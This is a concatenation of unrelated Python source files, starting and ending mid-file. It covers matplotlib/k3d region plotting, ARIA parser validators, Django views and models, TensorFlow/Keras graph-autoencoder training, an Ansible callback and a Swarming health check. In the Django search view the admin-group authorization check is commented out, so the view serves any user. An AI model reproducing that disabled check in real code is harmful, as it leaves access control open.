raise ValueError(msg)
def mpl(self, *, ax=None, figsize=None, color=dfu.cp_hex[0],
multiplier=None, filename=None, **kwargs):
"""``matplotlib`` plot.
If ``ax`` is not passed, ``matplotlib.axes.Axes`` object is created
automatically and the size of a figure can be specified using
``figsize``. The colour of lines depicting the region can be specified
using ``color`` argument, which must be a valid ``matplotlib`` color.
The plot is saved in PDF-format if ``filename`` is passed.
It is often the case that the object size is either small (e.g. on a
nanoscale) or very large (e.g. in units of kilometers). Accordingly,
``multiplier`` can be passed as :math:`10^{n}`, where :math:`n` is a
multiple of 3 (..., -6, -3, 0, 3, 6,...). According to that value, the
axes will be scaled and appropriate units shown. For instance, if
``multiplier=1e-9`` is passed, all axes will be divided by
:math:`1\\,\\text{nm}` and :math:`\\text{nm}` units will be used as
axis labels. If ``multiplier`` is not passed, the best one is
calculated internally.
This method is based on ``matplotlib.pyplot.plot``, so any keyword
arguments accepted by it can be passed (for instance, ``linewidth``,
``linestyle``, etc.).
Parameters
----------
ax : matplotlib.axes.Axes, optional
Axes to which the plot is added. Defaults to ``None`` - axes are
created internally.
figsize : (2,) tuple, optional
The size of a created figure if ``ax`` is not passed. Defaults to
``None``.
color : int, str, tuple, optional
A valid ``matplotlib`` color for lines depicting the region.
Defaults to the default color palette.
multiplier : numbers.Real, optional
Axes multiplier. Defaults to ``None``.
filename : str, optional
If filename is passed, the plot is saved. Defaults to ``None``.
Examples
--------
1. Visualising the region using ``matplotlib``.
>>> import discretisedfield as df
...
>>> p1 = (-50e-9, -50e-9, 0)
>>> p2 = (50e-9, 50e-9, 10e-9)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.mpl()
"""
if ax is None:
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111, projection='3d')
if multiplier is None:
multiplier = uu.si_max_multiplier(self.edges)
unit = f'({uu.rsi_prefixes[multiplier]}m)'
pmin = np.divide(self.pmin, multiplier)
pmax = np.divide(self.pmax, multiplier)
dfu.plot_box(ax=ax, pmin=pmin, pmax=pmax, color=color, **kwargs)
ax.set(xlabel=f'x {unit}', ylabel=f'y {unit}', zlabel=f'z {unit}')
# Overwrite default plotting parameters.
ax.set_facecolor('#ffffff') # white face color
ax.tick_params(axis='both', which='major', pad=0) # no pad for ticks
if filename is not None:
plt.savefig(filename, bbox_inches='tight', pad_inches=0)
def k3d(self, *, plot=None, color=dfu.cp_int[0], multiplier=None,
**kwargs):
"""``k3d`` plot.
If ``plot`` is not passed, ``k3d.Plot`` object is created
automatically. The colour of the region can be specified using
``color`` argument.
For details about ``multiplier``, please refer to
``discretisedfield.Region.mpl``.
This method is based on ``k3d.voxels``, so any keyword arguments
accepted by it can be passed (e.g. ``wireframe``).
Parameters
----------
plot : k3d.Plot, optional
Plot to which the plot is added. Defaults to ``None`` - plot is
created internally.
color : int, optional
Colour of the region. Defaults to the default color palette.
multiplier : numbers.Real, optional
Axes multiplier. Defaults to ``None``.
Examples
--------
1. Visualising the region using ``k3d``.
>>> import discretisedfield as df
...
>>> p1 = (-50e-9, -50e-9, 0)
>>> p2 = (50e-9, 50e-9, 10e-9)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.k3d()
Plot(...)
"""
if plot is None:
plot = k3d.plot()
plot.display()
if multiplier is None:
multiplier = uu.si_max_multiplier(self.edges)
unit = f'({uu.rsi_prefixes[multiplier]}m)'
plot_array = np.ones((1, 1, 1)).astype(np.uint8) # avoid k3d warning
bounds = [i for sublist in
zip(np.divide(self.pmin, multiplier),
np.divide(self.pmax, multiplier))
for i in sublist]
plot += k3d.voxels(plot_array, color_map=color, bounds=bounds,
outlines=False, **kwargs)
plot.axes = [i + r'\,\text{{{}}}'.format(unit)
for i in dfu.axesdict.keys()]
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from types import FunctionType
from ...utils.formatting import safe_repr
from ...utils.type import full_type_name
from ..validation import Issue
from .null import NULL
def get_locator(*values):
"""
Gets the first available locator.
:rtype: :class:`aria.parser.reading.Locator`
"""
for v in values:
if hasattr(v, '_locator'):
locator = v._locator
if locator is not None:
return locator
return None
def parse_types_dict_names(types_dict_names):
"""
If the first element in the array is a function, extracts it out.
"""
convert = None
if isinstance(types_dict_names[0], FunctionType):
convert = types_dict_names[0]
types_dict_names = types_dict_names[1:]
return types_dict_names, convert
def validate_primitive(value, cls, coerce=False):
"""
Checks if the value is of the primitive type, optionally attempting to coerce it
if it is not.
:raises ValueError: if not a primitive type or if coercion failed.
"""
if (cls is not None) and (value is not None):
if (cls is unicode) or (cls is str): # These two types are interchangeable
valid = isinstance(value, basestring)
elif cls is int:
# In Python, a bool is an int
valid = isinstance(value, int) and not isinstance(value, bool)
else:
valid = isinstance(value, cls)
if not valid:
if coerce:
if value is NULL:
value = None
value = cls(value)
else:
raise ValueError(u'not a "{0}": {1}'.format(full_type_name(cls), safe_repr(value)))
return value
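# Illustrative behaviour (not part of the original module):
#   validate_primitive('5', int, coerce=True)  -> 5
#   validate_primitive(True, int)              -> raises ValueError (bools are not accepted as ints)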
def validate_no_short_form(context, presentation):
"""
Makes sure that we can use short form definitions only if we allowed it.
"""
if not hasattr(presentation, 'SHORT_FORM_FIELD') and not isinstance(presentation._raw, dict):
context.validation.report(u'short form not allowed for field "{0}"'
.format(presentation._fullname),
locator=presentation._locator,
level=Issue.BETWEEN_FIELDS)
def validate_no_unknown_fields(context, presentation):
"""
Make sure that we can use unknown fields only if we allowed it.
"""
if not getattr(presentation, 'ALLOW_UNKNOWN_FIELDS', False) \
and not context.validation.allow_unknown_fields \
and isinstance(presentation._raw, dict) \
and hasattr(presentation, 'FIELDS'):
for k in presentation._raw:
if k not in presentation.FIELDS:
context.validation.report(u'field "{0}" is not supported in "{1}"'
.format(k, presentation._fullname),
locator=presentation._get_child_locator(k),
level=Issue.BETWEEN_FIELDS)
def validate_known_fields(context, presentation):
"""
Validates all known fields.
"""
if hasattr(presentation, '_iter_fields'):
for _, field in presentation._iter_fields():
field.validate(presentation, context)
def get_parent_presentation(context, presentation, *types_dict_names):
"""
Returns the parent presentation according to the ``derived_from`` field, or ``None`` if invalid.
Checks that we do not derive from ourselves and that we do not cause a circular hierarchy.
The arguments from the third onwards are used to locate a nested field under
``service_template`` under the root presenter. The first of these can optionally be a function,
in which case it will be called to convert type names. This can be used to support shorthand
type names, aliases, etc.
"""
type_name = presentation.derived_from
if type_name is None:
return None
types_dict_names, convert = parse_types_dict_names(types_dict_names)
types_dict = context.presentation.get('service_template', *types_dict_names) or {}
if convert:
type_name = convert(context, type_name, types_dict)
# Make sure not derived from self
if type_name == presentation._name:
return None
# Make sure derived from type exists
elif type_name not in types_dict:
return None
else:
# Make sure derivation hierarchy is not circular
hierarchy = [presentation._name]
presentation_copy = presentation
while presentation_copy.derived_from is not None:
derived_from = presentation_copy.derived_from
if convert:
derived_from = convert(context, derived_from, types_dict)
if derived_from == presentation_copy._name or derived_from not in types_dict:
return None
presentation_copy = types_dict[derived_from]
if presentation_copy._name in hierarchy:
return None
hierarchy.append(presentation_copy._name)
return types_dict[type_name]
def report_issue_for_unknown_type(context, presentation, type_name, field_name, value=None):
if value is None:
value = getattr(presentation, field_name)
context.validation.report(u'"{0}" refers to an unknown {1} in "{2}": {3}'
.format(field_name, type_name, presentation._fullname,
safe_repr(value)),
locator=presentation._get_child_locator(field_name),
level=Issue.BETWEEN_TYPES)
def report_issue_for_parent_is_self(context, presentation, field_name):
context.validation.report(u'parent type of "{0}" is self'.format(presentation._fullname),
locator=presentation._get_child_locator(field_name),
level=Issue.BETWEEN_TYPES)
def report_issue_for_unknown_parent_type(context, presentation, field_name):
context.validation.report(u'unknown parent type "{0}" in "{1}"'
.format(getattr(presentation, field_name), presentation._fullname),
locator=presentation._get_child_locator(field_name),
level=Issue.BETWEEN_TYPES)
def report_issue_for_circular_type_hierarchy(context, presentation, field_name):
context.validation.report(u'"{0}" of "{1}" creates a circular type hierarchy'
.format(getattr(presentation, field_name), presentation._fullname),
locator=presentation._get_child_locator(field_name),
level=Issue.BETWEEN_TYPES)
|
from django.shortcuts import render
# Create your views here.
from django.template import loader
from django.http import HttpResponse
from dashboard.vars import *
def search(request):
template = loader.get_template('home.html')
# Validate user
if request.user.get_username():
username = request.user.username.lower()
else:
username = 'none'
groups = ''
#is_admin = request.user.groups.filter(name='CloudAdmin').exists()
# if not is_admin:
# return render(request, '404.html', {})
data = {
'username': username,
'groups': groups,
'project_name': project_name,
'static_files_domain': static_files_domain
}
return HttpResponse(template.render(data, request))
|
from django.db import models
from django.contrib.auth.models import User
from datetime import datetime
from django.db.models.signals import post_save
from django.dispatch import receiver
import cloudinary
from cloudinary.models import CloudinaryField
class Neighbourhood(models.Model):
user = models.ForeignKey('Profile', null=True, blank=True, on_delete=models.CASCADE)
name=models.CharField(max_length=60, null=True)
description=models.CharField(max_length=400, null=True)
location=models.CharField(max_length=200, null=True)
population=models.IntegerField()
image = CloudinaryField( null = True, blank = True)
def __str__(self):
return self.name
def create_neigbourhood(self):
self.save()
def delete_neigbourhood(self):
self.delete()
@classmethod
def find_neighbourhood(cls,id):
neighbourhood = cls.objects.get(id=id)
return neighbourhood
def update_neighbourhood(self,name):
self.name = name
self.save()
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='profile')
bio = models.TextField(max_length=254, blank=True)
image =CloudinaryField(default='default.jpg')
hood = models.ForeignKey(Neighbourhood, on_delete=models.SET_NULL, null=True, related_name='users', blank=True)
def __str__(self):
return f'{self.user.username} profile'
class Business(models.Model):
user = models.OneToOneField(User, null=True, blank=True, on_delete=models.CASCADE)
name=models.CharField(max_length=60, null=True)
description=models.CharField(max_length=400, null=True)
neighborhood=models.ForeignKey(Neighbourhood,on_delete=models.CASCADE)
email=models.EmailField()
image =CloudinaryField(default='default.jpg')
def __str__(self):
return self.name
def create_business(self):
self.save()
def delete_business(self):
self.delete()
class Post(models.Model):
title = models.CharField(max_length=40)
post_description = models.CharField(max_length=50)
posted_by = models.ForeignKey(User,on_delete=models.CASCADE)
neighbourhood = models.ForeignKey('Neighbourhood',on_delete=models.CASCADE)
posted_on = models.DateTimeField(auto_now_add=True)
image= CloudinaryField(default='default.jpg')
def __str__(self):
return self.title
def save_post(self):
self.save()
def delete_post(self):
self.delete()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# __coconut_hash__ = 0xff55eb1
# Compiled with Coconut version 1.2.3-post_dev1 [Colonel]
# Coconut Header: --------------------------------------------------------
from __future__ import print_function, absolute_import, unicode_literals, division
import sys as _coconut_sys, os.path as _coconut_os_path
_coconut_file_path = _coconut_os_path.dirname(_coconut_os_path.abspath(__file__))
_coconut_sys.path.insert(0, _coconut_file_path)
from __coconut__ import _coconut, _coconut_MatchError, _coconut_tail_call, _coconut_tco, _coconut_igetitem, _coconut_compose, _coconut_pipe, _coconut_starpipe, _coconut_backpipe, _coconut_backstarpipe, _coconut_bool_and, _coconut_bool_or, _coconut_minus, _coconut_map, _coconut_partial
from __coconut__ import *
_coconut_sys.path.remove(_coconut_file_path)
# Compiled Coconut: ------------------------------------------------------
from .base_class import Base
from .inputs import GeneralInputs
from .inputs import Inputs
import tensorflow as tf
from tfinterface.decorators import return_self
from tfinterface.decorators import with_graph_as_default
from tfinterface.decorators import copy_self
from abc import abstractmethod
import os
from tfinterface import utils
import numpy as np
class ModelBase(Base):
def __init__(self, name, graph=None, sess=None, model_path=None, logs_path="logs", seed=None):
super(ModelBase, self).__init__(name, graph=graph, sess=sess)
with self.graph.as_default():
self.seed = seed
self.model_path = model_path if model_path else name
self.logs_path = logs_path
if self.seed is not None:
tf.set_random_seed(self.seed)
@return_self
@with_graph_as_default
def initialize(self, restore=False, model_path=None):
if not restore:
self.sess.run(tf.global_variables_initializer())
else:
var_list = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)
model_path = (os.path.abspath)((self.model_path if not model_path else model_path))
# Restore only this model's variables from the checkpoint.
tf.train.Saver(var_list).restore(self.sess, model_path)
@return_self
@with_graph_as_default
def save(self, model_path=None):
model_path = (os.path.abspath)((self.model_path if not model_path else model_path))
utils.make_dirs_for_path(model_path)
tf.train.Saver().save(self.sess, model_path)
@with_graph_as_default
def get_variables(self, graph_keys=tf.GraphKeys.TRAINABLE_VARIABLES, scope=None):
scope = scope if scope else self.name
return tf.get_collection(graph_keys, scope=scope)
@with_graph_as_default
def count_weights(self, *args, **kwargs):
return ((np.sum)((list)((_coconut.functools.partial(map, np.prod))((_coconut.functools.partial(map, _coconut.operator.methodcaller("as_list")))((_coconut.functools.partial(map, _coconut.operator.methodcaller("get_shape")))(self.get_variables(*args, **kwargs)))))))
class Model(ModelBase):
@abstractmethod
def predict(self, *args, **kwargs):
pass
def batch_predict(self, generator, print_fn=None, **kwargs):
preds_list = []
for batch in generator:
kwargs = kwargs.copy()
kwargs.update(batch)
preds = self.predict(**kwargs)
preds_list.append(preds)
if print_fn:
print_fn(batch)
return np.concatenate(preds_list, axis=0)
|
from __future__ import division, absolute_import
import sys
sys.path.append('..')
from functools import partial
from math import ceil
import pandas as pd
import numpy as np
from numpy.random import seed
import tensorflow as tf
from tensorflow import set_random_seed
import keras.backend as K
from keras.layers import Input, BatchNormalization, Activation, add, Lambda, Layer, LeakyReLU
from keras.models import Model
from keras.optimizers import Adam
from keras import regularizers
from keras.callbacks import EarlyStopping, ReduceLROnPlateau, Callback
from keras.losses import mean_squared_error
from keras.wrappers.scikit_learn import KerasRegressor
from custom_layers.tied_graph_autoencoder import TiedGraphAutoencoder, TiedGraphAutoencoderFP, neighbour_lookup, create_vni_vxi
from utils.data_gen import mask_atoms_by_degree
from NGF.preprocessing import tensorise_smiles
from sklearn.model_selection import train_test_split, StratifiedKFold
from skopt.utils import use_named_args
""" csv_path = '../datasets/cmap_canonical_smiles.csv'
smiles = pd.read_csv(csv_path, index_col=0)
smiles = smiles.loc[(smiles['Atoms'] >= 9) & (smiles['Atoms'] <= 62) & (smiles['0'] != 666)]
print(smiles)
smiles_x = np.array(smiles['0'])
# Specify model callbacks on training
es = EarlyStopping(monitor='val_loss',patience=5, min_delta=0)
rlr = ReduceLROnPlateau(monitor='val_loss',factor=0.5, patience=3, verbose=1, min_lr=0.0000001)
model_params = {
"num_layers" : 1,
"max_atoms" : 62,
"num_atom_features" : 62,
"num_atom_features_original" : 62,
"num_bond_features" : 6,
"max_degree" : 5,
"conv_width" : [84],
"fp_length" : [512],
"activ_enc" : "selu",
"activ_dec" : "selu",
"learning_rates" : [0.0078850884983896],
"learning_rates_fp": [0.0065],
"losses_conv" : {
"neighbor_output": "mean_squared_error",
"self_output": "mean_squared_error",
},
"lossWeights" : {"neighbor_output": 1.5, "self_output": 1.0},
"metrics" : "mse",
"loss_fp" : "mean_squared_error",
"enc_layer_names" : ["enc_1", "enc_2", "enc_3"],
'callbacks' : [es,rlr],
'adam_decay': 0.0005329142291371636,
'beta': 5,
'p': 0.004465204118126482
}
train_params = {
"epochs": 1,
"batch_size" : 256,
"validation_split" : 0.15
} """
def encode_smiles(max_atoms, num_atom_features, max_degree, num_bond_features):
atoms = Input(name='atoms', shape=(max_atoms, num_atom_features))
bonds = Input(name='bonds', shape=(max_atoms, max_degree, num_bond_features))
edges = Input(name='edge_inputs', shape=(max_atoms, max_degree), dtype='int32')
return atoms, bonds, edges
def stage_creator(model_params, layer, conv=True):
"""
Returns a set of stage I or II encoders and decoders as well as the appropriate datasets for training.
Inputs:
params: a list of parameters for the models that include max_atoms, number of atom and bond features seperately,
max_degree, conv_width, fp_length, activ_enc, activ_dec, optimizer, losses(dict), lossWeights(dict)
and metrics
layer: the layer for which we are creating the autoencoder
conv: choice between graph convolution(True) or graph fingerprint(False)
Output: model_dec
where:
model_dec: the decoder part of the model which also includes the model for the encoder (can be shown in summary)
"""
params = model_params.copy()
layer = layer - 1
atoms, bonds, edges = encode_smiles(params["max_atoms"],
params["num_atom_features"],
params["max_degree"],
params["num_bond_features"])
if conv:
assert params["conv_width"] is not None
print(f"LAYER {layer}")
if layer > 0:
atoms = Input(name='atom_feature_inputs', shape=(params["max_atoms"], params['conv_width'][layer-1]))
params['num_atom_features'] = params['conv_width'][layer-1]
# Stage I model
vxip1 = TiedGraphAutoencoder(params["conv_width"][layer],
original_atom_bond_features= None,
activ=None,
bias=True,
init='glorot_normal',
encode_only=True,
activity_reg = partial(sparse_reg, p=params['p'], beta=params['beta']))([atoms, bonds, edges])
#partial(sparse_reg, p=params['p'], beta=params['beta'])
vxip1 = BatchNormalization(momentum=0.6)(vxip1)
#if layer > 0:
vxip1 = LeakyReLU(alpha=0.3, name='vxi_plus_one')(vxip1)
#else:
#vxip1 = Activation('selu', name='vxi_plus_one')(vxip1)
model_enc = Model(inputs=[atoms, bonds, edges], outputs=[vxip1], name="graph_conv_encoder")
model_enc.name = params["enc_layer_names"][layer]
[vni_dot, vxi_dot] = TiedGraphAutoencoder(params["conv_width"][layer],
original_atom_bond_features=(params["num_atom_features"]+params["num_bond_features"]),
activ=None,
bias=True,
init='glorot_normal',
decode_only=True,
tied_to=model_enc.layers[3])([model_enc([atoms, bonds, edges]), bonds, edges])
model_dec_pre_act = Model(inputs=[atoms, bonds, edges], outputs=[vni_dot, vxi_dot])
vni_dot = BatchNormalization(momentum=0.6)(vni_dot)
#if layer > 0:
vni_dot = LeakyReLU(alpha=0.3, name="neighbor_output")(vni_dot)
#else:
# vni_dot = Activation('selu', name="neighbor_output")(vni_dot)
vxi_dot = BatchNormalization(momentum=0.6)(vxi_dot)
vxi_dot = Activation('selu', name="self_output")(vxi_dot)
model_dec_after_act = Model(inputs=[atoms, bonds, edges], outputs=[vni_dot, vxi_dot])
else:
assert params["fp_length"] is not None
# Stage II model
vxip1 = Input(name='vxip1', shape=(params["max_atoms"], params["conv_width"][layer]))
fp_out = TiedGraphAutoencoderFP(params["fp_length"][layer],
activ=None,
bias=True,
init='glorot_normal',
encode=True,
original_atom_bond_features=(params["conv_width"][layer]+ params["num_bond_features"]))([vxip1, bonds, edges])
fp_out = BatchNormalization(momentum=0.6)(fp_out)
fp_out = Activation('softmax')(fp_out)
model_enc = Model(inputs=[vxip1, bonds, edges], outputs=[fp_out], name='encoder_fp')
model_enc.name = params["enc_layer_names"][layer] + "_fp"
vxi_dot_fp = TiedGraphAutoencoderFP(params["fp_length"][layer],
activ=None,
bias=True,
init='lecun_normal',
decode=True,
original_atom_bond_features=(params["conv_width"][layer] + params["num_bond_features"]),
tied_to=model_enc.layers[3])([model_enc([vxip1, bonds, edges]), bonds, edges])
vxi_dot_fp = BatchNormalization(momentum=0.6)(vxi_dot_fp)
vxi_dot_fp = Activation('selu')(vxi_dot_fp)
model_dec = Model(inputs=[vxip1, bonds, edges], outputs=vxi_dot_fp)
if conv:
return model_enc, model_dec_pre_act, model_dec_after_act
else:
return model_dec, model_enc
def untrainable(layer):
assert isinstance(layer, Layer)
layer.trainable = False
return layer
def custom_mse(y_true, y_pred, val_loss):
mse = mean_squared_error(y_true, y_pred)
return mse + val_loss
def accumulative_loss(stage_I_val_loss):
def original(y_true, y_pred):
return custom_mse(y_true, y_pred, stage_I_val_loss)
return original
def add_new_layer(model_enc_old, params, train_params, layer, X):
"""
Adds a new TiedAutoencoder layer instance to the model and sets every other layer as non_trainable in order to train only the
    new one. Used for greedy layer-wise autoencoder training.
Inputs:
model_old: the existing Model of the autoencoder so far
new_layer: the layer which we want to add to the autoencoder, must have the same structure as the old one
TiedAutoencoderEnc
BatchNorm
Activation --> this structure defines the model_enc Model
--(new layer is inserted here with the same structure as the previous)--
TiedAutoencoderDec (tied to the first)
BatchNorm
Activation --> with the corresponding outputs of the model
params: the model_params dict
train_params: the model training parameters
layer: the current layer number
Outputs:
a new model with updated layers
the encoder part of the new model for the next layer training
"""
X_atoms, X_bonds, X_edges = X
atoms, bonds, edges = encode_smiles(params["max_atoms"],
params["num_atom_features_original"],
params["max_degree"],
params["num_bond_features"])
# For a start, make every other layer non trainable
model_enc_old.name = "stage_I_encoder_layer_" + str(layer-1)
model_enc_old.load_weights('layer_{}_stage_I_enc_weights.h5'.format(layer-1))
model_enc_old.trainable = False
#Create a new encoder for the next stage
new_enc, new_dec, _ = stage_creator(params, layer, conv=True)
new_enc.name = 'stage_I_encoder_layer_' + str(layer)
new_dec.name = 'stage_I_autoencoder_layer_' + str(layer)
vxip1 = model_enc_old([atoms, bonds, edges])
vxip1_new = new_enc([vxip1, bonds, edges])
create_vni_vxi_part = partial(create_vni_vxi, bonds=bonds, edges=edges)
vni, vxi = Lambda(create_vni_vxi_part)(vxip1)
vni_dot = new_dec([vxip1, bonds, edges])[0]
vxi_dot = new_dec([vxip1, bonds, edges])[1]
vni_dot = BatchNormalization(momentum=0.6)(vni_dot)
vni_dot = Activation(params["activ_dec"], name="neighbor_output")(vni_dot)
vxi_dot = BatchNormalization(momentum=0.6)(vxi_dot)
vxi_dot = Activation(params["activ_dec"], name="self_output")(vxi_dot)
enc = Model(inputs = [atoms, bonds, edges], outputs=[vxip1_new])
opt = Adam(lr=params["learning_rates"][layer-1], beta_1=0.9, beta_2=0.999, epsilon=1e-8,
decay=params['adam_decay'], amsgrad=False)
new = Model(inputs=[atoms, bonds, edges], outputs = [vni_dot, vxi_dot])
new.compile(optimizer=opt,metrics=['mse'], loss=['mse', 'mse'], target_tensors=[vni, vxi])
new.fit(x=[X_atoms, X_bonds, X_edges],
epochs=train_params['epochs'],
batch_size=train_params['batch_size'],
validation_split=train_params['validation_split'],
callbacks=params['callbacks'],
verbose=1)
# Set the weights for the next encoder equal to the trained ones from the new autoencoder encoder part
# Then, save the new encoders weights into an h5 file for later use
enc_weights = new.layers[-5].layers[3].get_weights()
enc.layers[-1].set_weights(enc_weights)
enc.save_weights('layer_{}_stage_I_enc_weights.h5'.format(layer))
new.layers[-5].layers[3].save_weights('layer_{}_stage_I_enc_weights_true.h5'.format(layer))
#print(enc.summary())
return new, enc
def add_new_layer_fp(model_enc_old, params, train_params, layer, X):
pass
def multistage_autoenc(smiles_x, num_layers, params, train_params):
# Create empty lists for outputs
#val_losses = []
# X_atom, X_bond, X_edge = tensorise_smiles(smiles_x[:2], max_degree=5, max_atoms=60)
print('Processing SMILES...')
#X, val = train_test_split(smiles_x, test_size=train_params["validation_split"], shuffle=True,
#random_state = np.random.randint(1, 10000))
X_atoms, X_bonds, X_edges = tensorise_smiles(smiles_x, max_degree=5, max_atoms=params['max_atoms'])
#X_atoms_val, X_bonds_val, X_edges_val = tensorise_smiles(val, max_degree=5, max_atoms=params['max_atoms'])
vni, vxi = vni_vxi(X_atoms, X_bonds, X_edges)
#vni_val, vxi_val = vni_vxi(X_atoms_val, X_bonds_val, X_edges_val)
# Iterate for every layer
for layer in range(1, num_layers+1):
opt = Adam(lr=params["learning_rates"][layer-1], beta_1=0.9, beta_2=0.999, epsilon=1e-8,
decay=params['adam_decay'], amsgrad=False)
#########################################################################
######################### STAGE I #######################################
#########################################################################
#gen = GraphDataGen(X, train_params['batch_size'], params, shuffle=False)
#valid = GraphDataGen(val, train_params['batch_size'], params, shuffle=False
if layer == 1:
stage_I_enc, _, stage_I_dec = stage_creator(params, layer, conv=True)
stage_I_dec.compile(optimizer=opt, loss=params['losses_conv'], metrics=['mse'])
stage_I_dec.fit(x=[X_atoms, X_bonds, X_edges], y=[vni, vxi], epochs=train_params['epochs'],validation_split=0.1,
callbacks=params['callbacks'],
batch_size=train_params['batch_size'])
stage_I_enc = stage_I_dec.layers[3]
stage_I_enc.save_weights('layer_{}_stage_I_enc_weights.h5'.format(layer))
#val_losses.append(stage_I_dec.evaluate(x=[X_atoms_val, X_bonds_val, X_edges_val], y=[vni_val, vxi_val])[0])
else:
stage_I_dec, stage_I_enc = add_new_layer(stage_I_enc, params, train_params, layer, X=[X_atoms, X_bonds, X_edges])
#########################################################################
######################### STAGE II ######################################
#########################################################################
stage_I_encodings = stage_I_enc.predict([X_atoms, X_bonds, X_edges])
_, vxi_II = vni_vxi(stage_I_encodings, X_bonds, X_edges)
stage_II_dec, stage_II_enc = stage_creator(params, layer, conv=False)
opt = Adam(lr=params["learning_rates_fp"][layer-1], beta_1=0.9, beta_2=0.999, epsilon=1e-8,
decay=params['adam_decay'], amsgrad=False)
stage_II_dec.compile(optimizer=opt, loss=params['loss_fp'], metrics=['mse'])
stage_II_dec.fit([stage_I_encodings, X_bonds, X_edges], y=[vxi_II],
epochs=train_params['epochs'],
validation_split=train_params['validation_split'],
callbacks=params['callbacks'],
batch_size=train_params['batch_size'],
verbose=1)
stage_II_enc.save_weights(f'layer_{layer}_stage_II_enc_weights.h5')
#stage_I_encodings_val = stage_I_enc.predict([X_atoms_val, X_bonds_val, X_edges_val])
#_, vxi_val = vni_vxi(stage_I_encodings_val, X_bonds_val, X_edges_val)
def sparse_reg(activ_matrix, p, beta):
p_hat = K.mean(activ_matrix) # average over the batch samples
#KLD = p*(K.log(p)-K.log(p_hat)) + (1-p)*(K.log(1-p)-K.log(1-p_hat))
KLD = p*(K.log(p/p_hat)) + (1-p)*(K.log((1-p)/(1-p_hat)))
return beta * K.sum(KLD) # sum over the layer units
def vni_vxi(atoms, bonds, edges):
vni, _ = mask_atoms_by_degree(atoms,edges,bonds = bonds)
summed_bond_features = np.sum(bonds, axis=-2)
vxi = np.concatenate([atoms, summed_bond_features], axis=-1)
return vni, vxi
|
# Copyright 2016 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" debug module is the new name of the human_readably module """
from __future__ import (absolute_import, division, print_function)
from ansible.plugins.callback.default \
import CallbackModule as CallbackModule_default
__metaclass__ = type
class CallbackModule(CallbackModule_default): # pylint: \
# disable=too-few-public-methods,no-init
'''
Override for the default callback module.
Render std err/out outside of the rest of the result which it prints with
indentation.
'''
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'stdout'
CALLBACK_NAME = 'debug'
def _dump_results(self, result):
'''Return the text to output for a result.'''
        # Enable JSON indentation
result['_ansible_verbose_always'] = True
save = {}
for key in ['stdout', 'stdout_lines', 'stderr', 'stderr_lines', 'msg']:
if key in result:
save[key] = result.pop(key)
output = CallbackModule_default._dump_results(self, result)
for key in ['stdout', 'stderr', 'msg']:
if key in save and save[key]:
output += '\n\n%s:\n\n%s\n' % (key.upper(), save[key])
for key, value in save.items():
result[key] = value
return output
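# Usage note (an assumption about typical deployment, not part of this module): a stdout
# callback plugin such as this one is normally enabled through ansible.cfg, e.g.
#     [defaults]
#     stdout_callback = debug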
|
#!/usr/bin/env python
# Copyright 2018 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Check the health of a Swarming version."""
import argparse
import collections
import functools
import json
import os
import subprocess
import sys
import time
HERE = os.path.dirname(__file__)
SWARMING_TOOL = os.path.join(HERE, '..', '..', '..', 'client', 'swarming.py')
def retry_exception(exc_type, max_attempts, delay):
"""Decorator to retry a function on failure with linear backoff.
Args:
exc_type: The type of exception raised by the function to retry.
max_attempts: Maximum number of times to call the function before reraising
the exception.
delay: Time to sleep between attempts, in seconds.
Returns:
A decorator to be applied to the function.
"""
def deco(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
for _ in range(max_attempts - 1):
try:
return fn(*args, **kwargs)
except exc_type:
time.sleep(delay)
return fn(*args, **kwargs)
return wrapper
return deco
@retry_exception(ValueError, 12, 10)
def pick_best_pool(url, server_version):
"""Pick the best pool to run the health check task on.
Asks the specified swarming server for a list of all bots, filters those
running the specified server version, and returns the pool with the most bots
in it.
Args:
url: The swarming server to query.
server_version: Which server version to filter bots by.
Returns:
A string indicating the best pool to run the health check task on.
"""
output = subprocess.check_output([
SWARMING_TOOL, 'query',
'-S', url,
'--limit', '0',
'bots/list?dimensions=server_version:%s' % server_version,
])
data = json.loads(output)
bots = data.get('items', [])
pool_counts = collections.Counter()
for bot in bots:
for dimension in bot.get('dimensions', []):
if dimension['key'] == 'pool':
pool_counts.update(dimension['value'])
if not pool_counts:
raise ValueError('No bots are running server_version=%s' % server_version)
return pool_counts.most_common(1)[0][0]
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--pool',
help='Pool to schedule a task on. If unspecified, this is autodetected.')
parser.add_argument('appid')
parser.add_argument('server_version')
args = parser.parse_args()
url = 'https://{server_version}-dot-{appid}.appspot.com'.format(
appid=args.appid,
server_version=args.server_version)
print 'Swarming server:', url
pool = args.pool
if not pool:
print 'Finding best pool to use'
pool = pick_best_pool(url, args.server_version)
print 'Scheduling no-op task on pool %r' % pool
rv = subprocess.call([
SWARMING_TOOL, 'run',
'-S', url,
'--expiration', '120',
'--hard-timeout', '120',
'-d', 'pool', pool,
'-d', 'server_version', args.server_version,
'--raw-cmd', '--', 'python', '-c', 'pass'])
if rv != 0:
print>>sys.stderr, 'Failed to run no-op task'
return 2
return 0
if __name__ == '__main__':
sys.exit(main())
|
r"""Run a species classifier.
